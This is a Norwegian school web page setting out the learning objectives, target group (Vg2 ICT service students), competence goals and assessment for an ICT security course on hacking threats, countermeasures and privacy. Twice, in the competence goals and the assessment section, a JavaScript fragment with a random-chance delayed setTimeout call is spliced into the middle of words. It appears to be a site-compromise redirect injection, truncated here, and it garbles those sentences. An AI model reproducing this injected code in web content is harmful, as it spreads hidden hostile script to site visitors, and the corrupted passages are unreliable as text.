1.4 DLL læringsmål – IKT sikkerhetskurs

DLL – den Digitale LæringsLøypen
DLL er et fleksibelt verktøy for variert undervisning.
DLL kan tilpasses ulike fagområder, kompetansemål og tema.
Denne utgaven av DLL som du nå arbeider med fokuserer på IKT sikkerhet.
Læringsressursene i løypen utgjør til sammen et IKT sikkerhetskurs.

Elevene skal etter gjennomført læringsløype – og IKT sikkerhetskurs – kjenne til:
1. viktige trusler mot IKT systemer, med hovedvekt på datainnbrudd/hacking
2. sentrale tiltak som kan iverksettes for å møte disse truslene
3. Personvern i lys av IKT sikkerhet

Målgruppe:
Elever IKT-servicefag Vg2 – kommende IKT-servicemedarbeidere som vil kunne bli involvert i sikring av IKT systemer

Viktigste kompetansemål – fra IKT servicefag programfag Drift og Vedlikehold, og Bruker- og Driftsstøtte:
– vurdere systeminstallasjoner mot krav til tilgjengelighet, informasjonssikkerhet og helse, miljø og sikkerhet
– aktivisere, vurdere og dokumentere sikkerhetsmekanismer for å forebygge og varsle forsøk på sikkerhetsbrudd
– behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle fortrolige opplysninger på en etisk forsvarlig måte innenfor rammene av gjeldende regelverk

Vurdering:
Deltagelse og gjennomføring av IKT sikkerhetskurset er obligatorisk.
IKT sikkerhetskurset inngår som en del av IKT servicefag pensum.
Oppgaver og innleveringer vil bli vurdert, og inngå i vurderingsgrunnlaget til standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andpunkt.